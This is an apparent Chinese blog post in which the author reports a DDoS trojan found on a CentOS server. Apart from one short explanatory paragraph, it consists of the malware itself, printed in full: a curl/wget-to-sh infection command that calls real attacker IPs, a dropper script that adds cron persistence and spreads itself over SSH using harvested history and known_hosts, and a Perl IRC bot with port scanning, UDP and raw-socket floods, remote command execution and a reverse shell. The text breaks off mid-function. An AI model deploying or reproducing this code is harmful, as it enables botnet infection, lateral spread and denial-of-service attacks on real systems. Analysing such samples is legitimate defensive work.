最近一段时间,所使用的CentOS服务器被不明人士安放了木马程序;观察发现该木马程序是用来发起DDOS攻击的肉鸡程序,在发作时占用绝大部分的网络带宽。
起点:
wget http://65.254.63.20/a|sh ; curl -O http://65.254.63.20/a ; sh a;rm -rf a*
执行完上面的代码以后,你的机器就已经中招了。以下是所下载和执行的代码:
plm=`ps x |grep httpd.conf|grep -v grep`plt=`cat /proc/cpuinfo|grep aes`#pgrep perl |sed '1d;' |xargs kill -9if [ "$plm" != "" ] then echoelse rm -rf apache* httpd.conf* /usr/local/bin/sysmonitord echo 'nameserver 8.8.8.8'> /etc/resolv.conf #/sbin/iptables -A OUTPUT -p tcp --dport 45560 -j ACCEPT kill -9 `ps x|grep stratum|awk '{print $1}'` kill -9 `ps x|grep httpd.conf|grep -v grep|awk '{print $1}'` #killall -9 sysmonitord sh wget curl crontab -r if [ -f libcurl.so.4 ] ; then echo else wget 223.255.145.158/libcrypto.so.6 > /dev/null 2>&1 wget 223.255.145.158/libcurl.so.4 > /dev/null 2>&1 wget 223.255.145.158/libssl.so.6 > /dev/null 2>&1 wget 223.255.145.158/libldap-2.3.so.0 > /dev/null 2>&1 wget 223.255.145.158/liblber-2.3.so.0 > /dev/null 2>&1 curl -O http://223.255.145.158/libcrypto.so.6 > /dev/null 2>&1 curl -O http://223.255.145.158/libssl.so.6 > /dev/null 2>&1 curl -O http://223.255.145.158/libcurl.so.4 > /dev/null 2>&1 curl -O http://223.255.145.158/libldap-2.3.so.0 > /dev/null 2>&1 curl -O http://223.255.145.158/liblber-2.3.so.0 > /dev/null 2>&1 export LD_LIBRARY_PATH=`pwd` fi curl -O http://65.254.63.20/apache > /dev/null 2>&1 wget -qO - http://65.254.63.20/.mail | perl curl -O http://65.254.63.20/.mail > /dev/null 2>&1 fetch http://65.254.63.20/.mail > /dev/null 2>&1 ; perl .mail ; rm -rf .mail* wget http://65.254.63.20/apache > /dev/null 2>&1 wget http://65.254.63.20/httpd.conf > /dev/null 2>&1 curl -O http://65.254.63.20/httpd.conf > /dev/null 2>&1 if [ -f /etc/cron.daily/anacron ] ; then echo else wget -O /etc/cron.daily/anacron http://65.254.63.20/a > /dev/null 2>&1 ; chmod +x /etc/cron.daily/anacron curl -O http://65.254.63.20/a > /dev/null 2>&1; mv a /etc/cron.daily/anacron ; chmod +x /etc/cron.daily/anacron fi chmod +x apache (exec ./apache -c httpd.conf &> /dev/null &) sleep 2 rm -rf wget* apache* httpd*fiif [ "$plm" != "" ] then echo else if [ "$plt" != "" ] then echo else wget http://65.254.63.20/apacheaes > /dev/null 2>&1 curl -O http://65.254.63.20/apacheaes > /dev/null 2>&1 wget http://65.254.63.20/httpd.conf > /dev/null 2>&1 curl -O http://65.254.63.20/httpd.conf > /dev/null 2>&1 chmod +x apacheaes mv apacheaes apache2 (exec ./apache2 -c httpd.conf &> /dev/null &) fifiif [ -f /tmp/.h ] ; then echoelsecat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h > /dev/null 2>&1cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h > /dev/null 2>&1cat /root/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h > /dev/null 2>&1cat /home/*/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h > /dev/null 2>&1cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h > /dev/null 2>&1cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h > /dev/null 2>&1cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h > /dev/null 2>&1cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h > /dev/null 2>&1for i in `cat /tmp/.h` ; do (exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget http://65.254.63.20/a|sh ; curl -O http://65.254.63.20/a ; sh a;rm -rf a*") > /dev/null 2>&1 ; donefihistory -rc 以上shell脚本代码主要是下载并执行相关代码,以启动相应功能的服务进程;然后分析相应的日志/历史文件,从中解析出相关IP地址,并尝试登录到相应IP地址并再次执行上述动作(即:下载并执行上述shell脚本,以达到感染其他机器的目的)。
上面的 wget http://65.254.63.20/.mail | perl 所下载并执行的perl代码:
#!/usr/bin/perlmy @mast3rs = ("G");my @hostauth = ("localhost");my @admchan=("#x");my @server = ("213.152.3.19");$servidor= $server[rand scalar @server] unless $servidor;my $xeqt = "!say";my $homedir = "/tmp";my $shellaccess = 1;my $xstats = 1;my $pacotes = 1;my $linas_max = 5;my $sleep = 6;my $portime = 4;my @fakeps = ("/usr/bin/httpd");my @nickname = ("V");my @xident = ("xxx");my @xname = (`uname -a`);################## Random Ports#################my @rports = ("8080");my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001", "\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001", "\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001", "\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001", "\001Snak for Macintosh 4.9.8 English\001", "\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001", "\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001", "\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001", "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001", "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001", "\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001", "\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001", "\001ircN 8.00 ^_-^_ he tries to tell me what I put inside of me ^_-^_\001", "\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001", "\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001", "\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001", "\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001", "\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001", "\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001", "\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001", "\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001", "\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001", "\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1??9] : Keep it to yourself!\001", "\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001", "\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001", "\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001", "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001", "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");# Default quick scan portsmy @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");# xeQt#my $nick = "Power";my $nick = $nickname[rand scalar @nickname];my $realname = $xname[rand scalar @xname];my $ircname = $xident[rand scalar @xident];my $porta = $rports[rand scalar @rports];my $xproc = $fakeps[rand scalar @fakeps];my $Mrx = $Mrx[rand scalar @Mrx];my $version = 'PowerBots (C) GohacK';my $echo = "`echo` $1";$SIG{'INT'} = 'IGNORE';$SIG{'HUP'} = 'IGNORE';$SIG{'TERM'} = 'IGNORE';$SIG{'CHLD'} = 'IGNORE';$SIG{'PS'} = 'IGNORE';use IO::Socket;use Socket;use IO::Select;chdir("$homedir");$servidor="$ARGV[0]" if $ARGV[0];$0="$xproc"."\0";my $pid=fork;exit if $pid;die "[x] -> Cannot fork into background: $!" unless defined($pid);my %irc_servers;my %DCC;my $dcc_sel = new IO::Select->new();sub getnick { return "$nickname[rand scalar @nickname]".int(rand(20000));}sub getstore ($$){ my $url = shift; my $file = shift; $http_stream_out = 1; open(GET_OUTFILE, "> $file"); %http_loop_check = (); _get($url); close GET_OUTFILE; return $main::http_get_result;}sub _get{ my $url = shift; my $proxy = ""; grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV; if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) { my $host = $1; my $port = $2 || 80; my $path = $3; $path = "/" unless defined($path); return _trivial_http_get($host, $port, $path); } elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) { my $host = $1; my $port = $2; my $path = $url; return _trivial_http_get($host, $port, $path); } else { return undef; }}sub _trivial_http_get{ my($host, $port, $path) = @_; my($AGENT, $VERSION, $p); #print "HOST=$host, PORT=$port, PATH=$path\n"; $AGENT = "get-minimal"; $VERSION = "20000118"; $path =~ s/ /%20/g; require IO::Socket; local($^W) = 0; my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Timeout => 60) || return; $sock->autoflush; my $netloc = $host; $netloc .= ":$port" if $port != 80; my $request = "GET $path HTTP/1.0\015\012" . "Host: $netloc\015\012" . "User-Agent: $AGENT/$VERSION/u\015\012"; $request .= "Pragma: no-cache\015\012" if ($main::http_no_cache); $request .= "\015\012"; print $sock $request; my $buf = ""; my $n; my $b1 = ""; while ($n = sysread($sock, $buf, 8*1024, length($buf))) { if ($b1 eq "") { $b1 = $buf; $buf =~ s/.+?\015?\012\015?\012//s; } if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; } } return undef unless defined($n); $main::http_get_result = 200; if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) { $main::http_get_result = $1; # print "CODE=$main::http_get_result\n$b1\n"; if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/) { my $url = $1; return undef if $http_loop_check{$url}++; return _get($url); } return undef unless $main::http_get_result =~ /^2/; } return $buf;}$sel_cliente = IO::Select->new();sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; }}sub conectar { my $meunick = $_[0]; my $servidor_con = $_[1]; my $porta_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_cliente->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; nick("$meunick"); sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); sleep 2; }}my $line_temp;while( 1 ) { while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } delete($irc_servers{''}) if (defined($irc_servers{''})); &DCC::connections; my @ready = $sel_cliente->can_read(0.6); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $msg, 4096); if ($nread == 0) { $sel_cliente->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $msg); for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line=$line_temp.$line if ($line_temp); $line_temp=''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } }}sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my $pn=$1; my $hostnam3=$3; my $onde = $4; my $args = $5; if ($args =~ /^\001VERSION\001$/) { notice("$pn", "".$Mrx.""); } elsif ($args =~ /^\001PING\s+(\d+)\001$/) { notice("$pn", "\001PONG\001"); } if (grep {$_ =~ /^\Q$hostnam3\E$/i } @hostauth) { if (grep {$_ =~ /^\Q$pn\E$/i } @mast3rs) { if ($onde eq "$meunick"){ shell("$pn", "$args"); } if ($args =~ /^!(.*)/){ ircase("$pn","$chan","$1"); } if ($args =~ /^(\Q$meunick\E|\Q$xeqt\E)\s+(.*)/ ) { my $natrix = $1; my $arg = $2; if ($arg =~ /^\!(.*)/) { ircase("$pn","$onde","$1"); } elsif ($arg =~ /^\@(.*)/) { $ondep = $onde; $ondep = $pn if $onde eq $meunick; bfunc("$ondep","$1"); } else { shell("$onde", "$arg"); } } } } } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($meunick)) { $meunick=$4; $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { $meunick = getnick(); nick("".$meunick."-"); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $meunick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; foreach my $canal (@admchan){ sendraw("JOIN $canal muietie"); } }}sub bfunc { my $printl = $_[0]; my $funcarg = $_[1]; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { # Quick scan if ($funcarg =~ /^ps (.*)/) { my $hostip="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Portscanning\003\002: $1 \002\00312Ports:\003\002 default"); my (@aberta, %porta_banner); foreach my $porta (@portas) { my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); if ($scansock) { push (@aberta, $porta); $scansock->close; sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open"); } } if (@aberta) { sendraw($IRC_cur_socket, "PRIVMSG $printl :Port Scan Complete with target: $1 "); } else { sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[x]\0034 No open ports found on\002 $1"); } } # NMAP, lol elsif ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/) { my $hostname="$1"; my $portstart = "$2"; my $portend = "$3"; my (@abertas, %porta_banner); sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312xMap Portscanning\003\002: $1 \002\00312Ports:\003\002 $2-$3"); foreach my $porta ($portstart..$portend) { my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); if ($scansock) { push (@abertas, $porta); $scansock->close; if ($xstats) { sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open"); } } } if (@abertas) { sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Scan Complate\003\002"); } else { sendraw($IRC_cur_socket,"PRIVMSG $printl :\002\00312No ports found..\002"); } } # Remove elsif ($funcarg =~ /^rm/) { system("cd /var/tmp ; rm -rf cb find god* wunder* udev* lib*"); sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Quickdel)\002\00314 Removed files and folders "); } # Version elsif ($funcarg =~ /^version/) { sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Version)\002\00314 $version "); } # Download elsif ($funcarg =~ /^down\s+(.*)\s+(.*)/) { getstore("$1", "$2"); sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Download)\002\00314 Page: $2 (File: $1)") if ($xstats); } # Udp elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) { return unless $pacotes; socket(Tr0x, PF_INET, SOCK_DGRAM, 17); my $alvo=inet_aton("$1"); my $porta = "$2"; my $tempo = "$3"; my $pacote; my $pacotese; my $fim = time + $tempo; my $pacota = 1; sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(UDP DDoSing)\003 Attacking\002: $1 - \002Time\002: $tempo"."seconds"); while (($pacota == "1") && ($pacotes == "1")) { $pacota = 0 if ((time >= $fim) && ($tempo != "0")); $pacote=$rand x $rand x $rand; $porta = int(rand 65000) +1 if ($porta == "0"); send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1"); } if ($xstats) { sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(UDP Complete):\003\002 $1 - \002Sendt\002: $pacotese"."kb - \002Time\002: $tempo"."seconds"); } } # Backconnect elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { my $host = "$1"; my $porta = "$2"; my $proto = getprotobyname('tcp'); my $iaddr = inet_aton($host); my $paddr = sockaddr_in($porta, $iaddr); my $shell = "/bin/sh -i"; if ($^O eq "MSWin32") { $shell = "cmd.exe"; } socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; connect(SOCKET, $paddr) or die "connect: $!"; sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[x] ->\0034 Injection ..."); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system("$shell"); system("cd /tmp/.mrx"); close(STDIN); close(STDOUT); close(STDERR); } exit; } }}sub ircase { my ($kem, $printl, $case) = @_; if ($case =~ /^join (.*)/) { j("$1"); } elsif ($case =~ /^part (.*)/) { p("$1"); } elsif ($case =~ /^rejoin\s+(.*)/) { my $chan = $1; if ($chan =~ /^(\d+) (.*)/) { for (my $ca = 1; $ca <= $1; $ca++ ) { p("$2"); j("$2"); } } else { p("$chan"); j("$chan"); } } elsif ($case =~ /^op/) { op("$printl", "$kem") if $case eq "op"; my $oarg = substr($case, 3); op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); } elsif ($case =~ /^deop/) { deop("$printl", "$kem") if $case eq "deop"; my $oarg = substr($case, 5); deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); } elsif ($case =~ /^voice/) { voice("$printl", "$kem") if $case eq "voice"; $oarg = substr($case, 6); voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); } elsif ($case =~ /^devoice/) { devoice("$printl", "$kem") if $case eq "devoice"; $oarg = substr($case, 8); devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); } elsif ($case =~ /^msg\s+(\S+) (.*)/) { msg("$1", "$2"); } elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { for (my $cf = 1; $cf <= $1; $cf++) { msg("$2", "$3"); } } elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { for (my $cf = 1; $cf <= $1; $cf++) { ctcp("$2", "$3"); } } elsif ($case =~ /^ctcp\s+(\S+) (.*)/) { ctcp("$1", "$2"); } elsif ($case =~ /^invite\s+(\S+) (.*)/) { invite("$1", "$2"); } elsif ($case =~ /^echo/) { system("echo $meunick > `pwd`/botnick"); msg("done"); } elsif ($case =~ /^nick (.*)/) { nick("$1"); } elsif ($case =~ /^jump\s+(\S+)\s+(\S+)/) { conectar("$2", "$1", 6667); } elsif ($case =~ /^send\s+(\S+)\s+(\S+)/) { DCC::SEND("$1", "$2"); } elsif ($case =~ /^raw (.*)/) { sendraw("$1"); } elsif ($case =~ /^eval (.*)/) { eval "$1"; } elsif ($case =~ /^rj\s+(\S+)\s+(\d+)/) { sleep int(rand($2)); j("$1"); } elsif ($case =~ /^rp\s+(\S+)\s+(\d+)/) { sleep int(rand($2)); p("$1"); } elsif ($case =~ /^quit/) { quit(); } elsif ($case =~ /^rand/) { my $novonick = getnick(); nick("$novonick"); } elsif ($case =~ /^stat (.*)/) { if ($1 eq "on") { $xstats = 1; msg("$printl", "Satus enabled"); } elsif ($1 eq "off") { $xstats = 0; msg("$printl", "Status disable"); } } elsif ($case =~ /^bang (.*)/) { if ($1 eq "on") { $pacotes = 1; msg("$printl", "[x] Bang mode enabled") if ($xstats == "1"); } elsif ($1 eq "off") { $pacotes = 0; msg("$printl", "[x] Bang mode disabled") if ($xstats == "1"); } }}sub shell { return unless $shellaccess; my $printl=$_[0]; my $comando=$_[1]; if ($comando =~ /cd (.*)/) { chdir("$1") || msg("$printl", "cd: $1".": No such file or directory"); return; } elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my @resp=`$comando 2>&1 3>&1`; my $c=0; foreach my $linha (@resp) { $c++; chop $linha; sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); if ($c >= "$linas_max") { $c=0; sleep $sleep; } } exit; } }}sub attacker { my $iaddr = inet_aton($_[0]); my $msg = 'B' x $_[1]; my $ftime = $_[2]; my $cp = 0; my (%pacotes); $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; return(undef) if $cp == 4; my $itime = time; my ($cur_time); while ( 1 ) { for (my $porta = 1; $porta <= 65535; $porta++) { $cur_time = time - $itime; last if $cur_time >= $ftime; send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1); send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1); send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1); send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1); for (my $pc = 3; $pc <= 255;$pc++) { next if $pc == 6; $cur_time = time - $itime; last if $cur_time >= $ftime; socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1); } } last if $cur_time >= $ftime; } return($cur_time, %pacotes);}sub action { return unless $#_ == 1; sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");}sub ctcp { return unless $#_ == 1; sendraw("PRIVMSG $_[0] :\001$_[1]\001");}sub msg { return unless $#_ == 1; sendraw("PRIVMSG $_[0] :$_[1]");}sub notice { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]");}sub op { return unless $#_ == 1; sendraw("MODE $_[0] +o $_[1]");}sub deop { return unless $#_ == 1; sendraw("MODE $_[0] -o $_[1]");}sub hop { return unless $#_ == 1; sendraw("MODE $_[0] +h $_[1]");}sub dehop { return unless $#_ == 1; sendraw("MODE $_[0] +h $_[1]");}sub voice { return unless $#_ == 1; sendraw("MODE $_[0] +v $_[1]");}sub devoice { return unless $#_ == 1; sendraw("MODE $_[0] -v $_[1]");}sub ban { return unless $#_ == 1; sendraw("MODE $_[0] +b $_[1]");}sub unban { return unless $#_ == 1; sendraw("MODE $_[0] -b $_[1]");}sub kick { return unless $#_ == 1; sendraw("KICK $_[0] $_[1] :$_[2]");}sub modo { return unless $#_ == 0; sendraw("MODE $_[0] $_[1]");}sub mode { modo(@_); }sub j { &join(@_); }sub join { return unless $#_ == 0; sendraw("JOIN $_[0]");}sub p { part(@_); }sub part {sendraw("PART $_[0]");}sub nick { return unless $#_ == 0; sendraw("NICK $_[0]");}sub invite { return unless $#_ == 1; sendraw("INVITE $_[1] $_[0]");}sub topico { return unless $#_ == 1; sendraw("TOPIC $_[0] $_[1]");}sub topic { topico(@_); }sub whois { return unless $#_ == 0; sendraw("WHOIS $_[0]");}sub who { return unless $#_ == 0; sendraw("WHO $_[0]");}sub names { return unless $#_ == 0; sendraw("NAMES $_[0]");}sub away { sendraw("AWAY $_[0]");}sub back { away(); }sub quit { sendraw("QUIT :$_[0]"); exit;}package DCC;sub connections { my @ready = $dcc_sel->can_read(1);# return unless (@ready); foreach my $fh (@ready) { my $dcctipo = $DCC{$fh}{tipo}; my $arquivo = $DCC{$fh}{arquivo}; my $bytes = $DCC{$fh}{bytes}; my $cur_byte = $DCC{$fh}{curbyte}; my $nick = $DCC{$fh}{nick}; my $msg; my $nread = sysread($fh, $msg, 10240); if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) { $DCC{$fh}{status} = "Cancelado"; $DCC{$fh}{ftime} = time; $dcc_sel->remove($fh); $fh->close; next; } if ($dcctipo eq "get") { $DCC{$fh}{curbyte} += length($msg); my $cur_byte = $DCC{$fh}{curbyte}; open(FILE, ">> $arquivo"); print FILE "$msg" if ($cur_byte <= $bytes); close(FILE); my $packbyte = pack("N", $cur_byte); print $fh "$packbyte"; if ($bytes == $cur_byte) { $dcc_sel->remove($fh); $fh->close; $DCC{$fh}{status} = "Recebido"; $DCC{$fh}{ftime} = time; next; } } elsif ($dcctipo eq "send") { my $send = $fh->accept; $send->autoflush(1); $dcc_sel->add($send); $dcc_sel->remove($fh); $DCC{$send}{tipo} = 'sendcon'; $DCC{$send}{itime} = time; $DCC{$send}{nick} = $nick; $DCC{$send}{bytes} = $bytes; $DCC{$send}{curbyte} = 0; $DCC{$send}{arquivo} = $arquivo; $DCC{$send}{ip} = $send->peerhost; $DCC{$send}{porta} = $send->peerport; $DCC{$send}{status} = "Enviando"; open(FILE, "< $arquivo"); my $fbytes; read(FILE, $fbytes, 1024); print $send "$fbytes"; close FILE;# delete($DCC{$fh}); } elsif ($dcctipo eq 'sendcon') { my $bytes_sended = unpack("N", $msg); $DCC{$fh}{curbyte} = $bytes_sended; if ($bytes_sended == $bytes) { $fh->close; $dcc_sel->remove($fh); $DCC{$fh}{status} = "Enviado"; $DCC{$fh}{ftime} = time; next; } open(SENDFILE, "< $arquivo"); seek(SENDFILE, $bytes_sended, 0); my $send_bytes; read(SENDFILE, $send_bytes, 1024); print $fh "$send_bytes"; close(SENDFILE); } }}sub SEND { my ($nick, $arquivo) = @_; unless (-r "$arquivo") { return(0); } my $dccark = $arquivo; $dccark =~ s/[.*\/](\S+)/$1/; my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'}; my $longip = unpack("N",inet_aton($meuip)); my @filestat = stat($arquivo); my $size_total=$filestat[7]; if ($size_total == 0) { return(0); } my ($porta, $sendsock); do { $porta = int rand(64511); $porta += 1024; $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock); } until $sendsock; $DCC{$sendsock}{tipo} = 'send'; $DCC{$sendsock}{nick} = $nick; $DCC{$sendsock}{bytes} = $size_total; $DCC{$sendsock}{arquivo} = $arquivo; &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");}sub GET { my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_; return(0) if (-e "$arquivo"); if (open(FILE, "> $arquivo")) { close FILE; } else { return(0); } my $dccip=fixaddr($dcclongip); return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1); my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0); $dccsock->autoflush(1); $dcc_sel->add($dccsock); $DCC{$dccsock}{tipo} = 'get'; $DCC{$dccsock}{itime} = time; $DCC{$dccsock}{nick} = $nick; $DCC{$dccsock}{bytes} = $bytes; $DCC{$dccsock}{curbyte} = 0; $DCC{$dccsock}{arquivo} = $arquivo; $DCC{$dccsock}{ip} = $dccip; $DCC{$dccsock}{porta} = $dccporta; $DCC{$dccsock}{status} = "Recebendo";}sub Status { my $socket = shift; my $sock_tipo = $DCC{$socket}{tipo}; unless (lc($sock_tipo) eq "chat") { my $nick = $DCC{$socket}{nick}; my $arquivo = $DCC{$socket}{arquivo}; my $itime = $DCC{$socket}{itime}; my $ftime = time; my $status = $DCC{$socket}{status}; $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime}); my $d_time = $ftime-$itime; my $cur_byte = $DCC{$socket}{curbyte}; my $bytes_total = $DCC{$socket}{bytes}; my $rate = 0; $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0; my $porcen = ($cur_byte*100)/$bytes_total; my ($r_duv, $p_duv); if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) { $r_duv = $3; $r_duv++ if $4 >= 5; $rate = "$1\.$2"."$r_duv"; } if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) { $p_duv = $3; $p_duv++ if $4 >= 5; $porcen = "$1\.$2"."$p_duv"; } return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen"); } return(0);}sub fixaddr { my ($address) = @_; chomp $address; if ($address =~ /^\d+$/) { return inet_ntoa(pack "N", $address); } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) { return $address; } elsif ($address =~ tr/a-zA-Z//) { return 